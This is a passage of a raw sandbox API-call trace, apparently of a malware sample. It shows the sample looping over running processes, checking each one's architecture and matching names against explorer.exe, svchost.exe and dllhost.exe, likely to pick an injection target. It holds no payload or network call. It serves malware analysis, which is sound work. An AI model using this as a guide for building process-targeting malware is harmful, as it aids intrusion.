Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.502] CloseHandle (hObject=0xec) returned 1 [0183.502] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0183.502] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0183.502] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0183.502] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0183.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0183.503] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.503] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.503] CloseHandle (hObject=0xec) returned 1 [0183.503] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0183.503] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0183.503] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0183.503] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0183.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0183.503] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.503] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.503] CloseHandle (hObject=0xec) returned 1 [0183.504] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0183.504] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0183.504] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0183.504] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0183.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0183.504] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.504] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.504] CloseHandle (hObject=0xec) returned 1 [0183.504] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0183.504] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0183.504] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0183.504] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0183.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0183.505] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.505] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.505] CloseHandle (hObject=0xec) returned 1 [0183.505] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0183.505] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0183.505] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0183.505] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0183.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0183.506] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.506] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.506] CloseHandle (hObject=0xec) returned 1 [0183.506] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0183.506] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0183.506] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0183.506] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0183.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0183.506] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.507] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.507] CloseHandle (hObject=0xec) returned 1 [0183.507] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0183.507] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0183.507] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0183.507] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0183.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0183.507] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.507] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.507] CloseHandle (hObject=0xec) returned 1 [0183.507] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0183.507] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0183.507] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0183.507] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0183.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0183.508] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.508] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.508] CloseHandle (hObject=0xec) returned 1 [0183.508] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0183.508] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0183.508] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0183.508] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0183.508] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0183.509] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0183.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0183.509] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0183.510] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0183.510] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0183.511] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0183.512] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.512] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.512] CloseHandle (hObject=0xec) returned 1 [0183.512] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0183.512] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.512] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.512] CloseHandle (hObject=0xec) returned 1 [0183.512] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0183.513] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0183.513] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.513] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.513] CloseHandle (hObject=0xec) returned 1 [0183.513] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0183.513] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0183.514] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.514] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.514] CloseHandle (hObject=0xec) returned 1 [0183.514] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.515] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0183.515] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.515] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.515] CloseHandle (hObject=0xec) returned 1 [0183.515] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0183.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0183.516] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.516] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.516] CloseHandle (hObject=0xec) returned 1 [0183.516] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0183.516] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0183.516] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0183.516] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0183.516] CloseHandle (hObject=0xe8) returned 1 [0183.516] Sleep (dwMilliseconds=0x3e8) [0184.526] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0184.527] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0184.528] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0184.528] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0184.529] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0184.529] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0184.530] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0184.530] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0184.531] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0184.531] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0184.532] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0184.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0184.532] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0184.533] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0184.533] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0184.534] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0184.534] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0184.535] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0184.535] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0184.536] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0184.536] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0184.537] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.537] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.537] CloseHandle (hObject=0xec) returned 1 [0184.537] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0184.537] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0184.538] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.538] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.538] CloseHandle (hObject=0xec) returned 1 [0184.538] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0184.538] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0184.539] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0184.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0184.539] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.539] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.539] CloseHandle 